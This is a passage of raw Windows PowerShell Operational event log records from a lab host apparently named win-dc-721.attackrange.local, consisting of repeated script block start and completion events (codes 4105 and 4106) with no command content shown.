Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468697
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468696
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468695
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468694
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468693
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468692
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468691
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468690
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468689
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468688
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468687
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468686
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468685
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468684
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468683
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468682
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468681
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468680
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468679
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468678
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468677
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468676
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468675
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468674
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468673
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468672
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468671
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468670
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468669
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468668
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468667
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468666
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468665
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468664
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468663
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468662
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468661
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468660
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468659
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468658
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468657
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468656
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468655
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468654
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468653
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468652
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468651
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468650
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468649
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468648
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468647
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468646
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468645
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468920
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468919
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468918
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
